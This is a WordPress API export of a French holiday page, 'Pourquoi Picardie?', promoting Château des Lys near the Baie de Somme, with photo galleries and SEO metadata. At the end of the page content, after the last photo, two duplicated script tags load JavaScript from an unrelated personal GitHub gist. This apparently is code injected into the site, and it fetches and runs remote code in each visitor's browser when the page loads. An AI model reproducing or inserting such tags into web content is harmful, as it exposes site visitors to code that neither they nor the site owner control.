{"id":468,"date":"2015-09-19T15:44:11","date_gmt":"2015-09-19T15:44:11","guid":{"rendered":"https:\/\/www.chateaudeslys.com\/?page_id=468"},"modified":"2016-05-25T12:23:22","modified_gmt":"2016-05-25T12:23:22","slug":"why-picardie","status":"publish","type":"page","link":"https:\/\/www.chateaudeslys.com\/fr\/fractional-ownership-at-the-chateau\/why-picardie\/","title":{"rendered":"Pourquoi Picardie?"},"content":{"rendered":"<p>Pour tous ceux qui r\u00eavent de leurs vacances loin de la vie de la ville occup\u00e9e Chateau des Lys est une destination parfaite. Situ\u00e9 \u00e0 seulement 200 km de Paris et Lille, et \u00e0 seulement quelques minutes de l&rsquo;A16, le ch\u00e2teau est facilement en quelques heures d&rsquo;acc\u00e8s en voiture ou en train.<\/p>\n<table style=\"height: 276px;\" width=\"718\">\n<tbody>\n<tr>\n<td><a href=\"https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2015\/09\/01-IMG_6652.jpg\" data-rel=\"lightbox-image-0\" data-magnific_type=\"image\" data-rl_title=\"\" data-rl_caption=\"\" title=\"\"><img loading=\"lazy\" class=\"aligncenter wp-image-734\" src=\"https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2015\/09\/01-IMG_6652-150x150.jpg\" alt=\"01-IMG_6652\" width=\"182\" height=\"182\" \/><\/a><\/td>\n<td><a href=\"https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2013\/01\/20-img_0377.jpg\" data-rel=\"lightbox-image-1\" data-magnific_type=\"image\" data-rl_title=\"\" data-rl_caption=\"\" title=\"\"><img loading=\"lazy\" class=\"aligncenter wp-image-106 \" src=\"https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2013\/01\/20-img_0377.jpg\" alt=\"\" width=\"280\" height=\"186\" \/><\/a><\/td>\n<td><a href=\"https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2013\/01\/21-img_0596.jpg\" data-rel=\"lightbox-image-2\" data-magnific_type=\"image\" data-rl_title=\"\" data-rl_caption=\"\" title=\"\"><img loading=\"lazy\" class=\"aligncenter wp-image-554\" src=\"https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2015\/09\/17-15-IMG_47271-150x150.jpg\" alt=\"17-15-IMG_4727\" width=\"190\" height=\"190\" srcset=\"https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2015\/09\/17-15-IMG_47271-150x150.jpg 150w, https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2015\/09\/17-15-IMG_47271-110x110.jpg 110w\" sizes=\"(max-width: 190px) 100vw, 190px\" \/><br \/>\n<\/a><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>Le cadre magnifique de la Baie de Somme a tous les ingr\u00e9dients pour profiter sans fin: une belle c\u00f4te, les for\u00eats anciennes, restaurants, march\u00e9s anim\u00e9s, golf, cano\u00eb-kayak, la randonn\u00e9e, le v\u00e9lo, l&rsquo;histoire et la nature.<\/p>\n<p><a href=\"https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2013\/01\/21-img_0596.jpg\" data-rel=\"lightbox-image-2\" data-magnific_type=\"image\" data-rl_title=\"\" data-rl_caption=\"\" title=\"\"><img loading=\"lazy\" class=\"aligncenter size-full wp-image-107\" src=\"https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2013\/01\/21-img_0596.jpg\" alt=\"21-img_0596\" width=\"415\" height=\"276\" \/><\/a> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script><\/p>","protected":false},"excerpt":{"rendered":"<p>Pour tous ceux qui r\u00eavent de leurs vacances loin de la vie de la ville occup\u00e9e Chateau des Lys est une destination parfaite. Situ\u00e9 \u00e0 seulement 200 km de Paris et Lille, et \u00e0 seulement quelques minutes de l&rsquo;A16, le ch\u00e2teau est facilement en quelques heures d&rsquo;acc\u00e8s en voiture ou en train. Le cadre magnifique de la Baie de Somme &hellip;<span class=\"more-link\"><a href=\"https:\/\/www.chateaudeslys.com\/fr\/fractional-ownership-at-the-chateau\/why-picardie\/\"><span class=\"button\">Continue reading &rarr;<\/span><\/a><\/span><\/p>\n","protected":false},"author":1,"featured_media":0,"parent":940,"menu_order":7,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v18.7 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Pourquoi Picardie? - Escape To Chateau DIY - Mariages, Ev\u00e8nements, Famille - Ch\u00e2teau des Lys Picardie<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.chateaudeslys.com\/fractional-ownership-at-the-chateau\/buying-a-part-of-the-chateau__trashed\/why-picardie\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Pourquoi Picardie? - Escape To Chateau DIY - Mariages, Ev\u00e8nements, Famille - Ch\u00e2teau des Lys Picardie\" \/>\n<meta property=\"og:description\" content=\"Pour tous ceux qui r\u00eavent de leurs vacances loin de la vie de la ville occup\u00e9e Chateau des Lys est une destination parfaite. Situ\u00e9 \u00e0 seulement 200 km de Paris et Lille, et \u00e0 seulement quelques minutes de l&rsquo;A16, le ch\u00e2teau est facilement en quelques heures d&rsquo;acc\u00e8s en voiture ou en train. Le cadre magnifique de la Baie de Somme &hellip;Continue reading &rarr;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.chateaudeslys.com\/fractional-ownership-at-the-chateau\/buying-a-part-of-the-chateau__trashed\/why-picardie\/\" \/>\n<meta property=\"og:site_name\" content=\"Escape To Chateau DIY - Mariages, Ev\u00e8nements, Famille - Ch\u00e2teau des Lys Picardie\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/chateaudeslysfr\/\" \/>\n<meta property=\"article:modified_time\" content=\"2016-05-25T12:23:22+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2015\/09\/01-IMG_6652-150x150.jpg\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:site\" content=\"@ChateaudeslysEn\" \/>\n<meta name=\"twitter:label1\" content=\"Dur\u00e9e de lecture estim\u00e9e\" \/>\n\t<meta name=\"twitter:data1\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.chateaudeslys.com\/fr\/#website\",\"url\":\"https:\/\/www.chateaudeslys.com\/fr\/\",\"name\":\"Escape To Chateau DIY - Mariages, Ev\u00e8nements, Famille - Ch\u00e2teau des Lys Picardie\",\"description\":\"Un lieu id\u00e9al pour s&#039;\u00e9vader, se d\u00e9tendre et se d\u00e9tendre. Il constitue un pied-\u00e0-terre id\u00e9al pour explorer la magnifique vall\u00e9e de la Somme pendant les vacances.\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.chateaudeslys.com\/fr\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\/\/www.chateaudeslys.com\/fractional-ownership-at-the-chateau\/buying-a-part-of-the-chateau__trashed\/why-picardie\/#primaryimage\",\"url\":\"https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2015\/09\/01-IMG_6652-150x150.jpg\",\"contentUrl\":\"https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2015\/09\/01-IMG_6652-150x150.jpg\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.chateaudeslys.com\/fractional-ownership-at-the-chateau\/buying-a-part-of-the-chateau__trashed\/why-picardie\/#webpage\",\"url\":\"https:\/\/www.chateaudeslys.com\/fractional-ownership-at-the-chateau\/buying-a-part-of-the-chateau__trashed\/why-picardie\/\",\"name\":\"Pourquoi Picardie? - Escape To Chateau DIY - Mariages, Ev\u00e8nements, Famille - Ch\u00e2teau des Lys Picardie\",\"isPartOf\":{\"@id\":\"https:\/\/www.chateaudeslys.com\/fr\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.chateaudeslys.com\/fractional-ownership-at-the-chateau\/buying-a-part-of-the-chateau__trashed\/why-picardie\/#primaryimage\"},\"datePublished\":\"2015-09-19T15:44:11+00:00\",\"dateModified\":\"2016-05-25T12:23:22+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/www.chateaudeslys.com\/fractional-ownership-at-the-chateau\/buying-a-part-of-the-chateau__trashed\/why-picardie\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.chateaudeslys.com\/fractional-ownership-at-the-chateau\/buying-a-part-of-the-chateau__trashed\/why-picardie\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.chateaudeslys.com\/fractional-ownership-at-the-chateau\/buying-a-part-of-the-chateau__trashed\/why-picardie\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.chateaudeslys.com\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Private: Chateau Fractions\",\"item\":\"https:\/\/www.chateaudeslys.com\/?page_id=940\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Why Picardie?\"}]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Pourquoi Picardie? - Escape To Chateau DIY - Mariages, Ev\u00e8nements, Famille - Ch\u00e2teau des Lys Picardie","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.chateaudeslys.com\/fractional-ownership-at-the-chateau\/buying-a-part-of-the-chateau__trashed\/why-picardie\/","og_locale":"fr_FR","og_type":"article","og_title":"Pourquoi Picardie? - Escape To Chateau DIY - Mariages, Ev\u00e8nements, Famille - Ch\u00e2teau des Lys Picardie","og_description":"Pour tous ceux qui r\u00eavent de leurs vacances loin de la vie de la ville occup\u00e9e Chateau des Lys est une destination parfaite. Situ\u00e9 \u00e0 seulement 200 km de Paris et Lille, et \u00e0 seulement quelques minutes de l&rsquo;A16, le ch\u00e2teau est facilement en quelques heures d&rsquo;acc\u00e8s en voiture ou en train. Le cadre magnifique de la Baie de Somme &hellip;Continue reading &rarr;","og_url":"https:\/\/www.chateaudeslys.com\/fractional-ownership-at-the-chateau\/buying-a-part-of-the-chateau__trashed\/why-picardie\/","og_site_name":"Escape To Chateau DIY - Mariages, Ev\u00e8nements, Famille - Ch\u00e2teau des Lys Picardie","article_publisher":"https:\/\/www.facebook.com\/chateaudeslysfr\/","article_modified_time":"2016-05-25T12:23:22+00:00","og_image":[{"url":"https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2015\/09\/01-IMG_6652-150x150.jpg"}],"twitter_card":"summary_large_image","twitter_site":"@ChateaudeslysEn","twitter_misc":{"Dur\u00e9e de lecture estim\u00e9e":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"https:\/\/www.chateaudeslys.com\/fr\/#website","url":"https:\/\/www.chateaudeslys.com\/fr\/","name":"Escape To Chateau DIY - Mariages, Ev\u00e8nements, Famille - Ch\u00e2teau des Lys Picardie","description":"Un lieu id\u00e9al pour s&#039;\u00e9vader, se d\u00e9tendre et se d\u00e9tendre. Il constitue un pied-\u00e0-terre id\u00e9al pour explorer la magnifique vall\u00e9e de la Somme pendant les vacances.","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.chateaudeslys.com\/fr\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"fr-FR"},{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/www.chateaudeslys.com\/fractional-ownership-at-the-chateau\/buying-a-part-of-the-chateau__trashed\/why-picardie\/#primaryimage","url":"https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2015\/09\/01-IMG_6652-150x150.jpg","contentUrl":"https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2015\/09\/01-IMG_6652-150x150.jpg"},{"@type":"WebPage","@id":"https:\/\/www.chateaudeslys.com\/fractional-ownership-at-the-chateau\/buying-a-part-of-the-chateau__trashed\/why-picardie\/#webpage","url":"https:\/\/www.chateaudeslys.com\/fractional-ownership-at-the-chateau\/buying-a-part-of-the-chateau__trashed\/why-picardie\/","name":"Pourquoi Picardie? - Escape To Chateau DIY - Mariages, Ev\u00e8nements, Famille - Ch\u00e2teau des Lys Picardie","isPartOf":{"@id":"https:\/\/www.chateaudeslys.com\/fr\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.chateaudeslys.com\/fractional-ownership-at-the-chateau\/buying-a-part-of-the-chateau__trashed\/why-picardie\/#primaryimage"},"datePublished":"2015-09-19T15:44:11+00:00","dateModified":"2016-05-25T12:23:22+00:00","breadcrumb":{"@id":"https:\/\/www.chateaudeslys.com\/fractional-ownership-at-the-chateau\/buying-a-part-of-the-chateau__trashed\/why-picardie\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.chateaudeslys.com\/fractional-ownership-at-the-chateau\/buying-a-part-of-the-chateau__trashed\/why-picardie\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.chateaudeslys.com\/fractional-ownership-at-the-chateau\/buying-a-part-of-the-chateau__trashed\/why-picardie\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.chateaudeslys.com\/"},{"@type":"ListItem","position":2,"name":"Private: Chateau Fractions","item":"https:\/\/www.chateaudeslys.com\/?page_id=940"},{"@type":"ListItem","position":3,"name":"Why Picardie?"}]}]}},"_links":{"self":[{"href":"https:\/\/www.chateaudeslys.com\/fr\/wp-json\/wp\/v2\/pages\/468"}],"collection":[{"href":"https:\/\/www.chateaudeslys.com\/fr\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.chateaudeslys.com\/fr\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.chateaudeslys.com\/fr\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.chateaudeslys.com\/fr\/wp-json\/wp\/v2\/comments?post=468"}],"version-history":[{"count":0,"href":"https:\/\/www.chateaudeslys.com\/fr\/wp-json\/wp\/v2\/pages\/468\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/www.chateaudeslys.com\/fr\/wp-json\/wp\/v2\/pages\/940"}],"wp:attachment":[{"href":"https:\/\/www.chateaudeslys.com\/fr\/wp-json\/wp\/v2\/media?parent=468"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}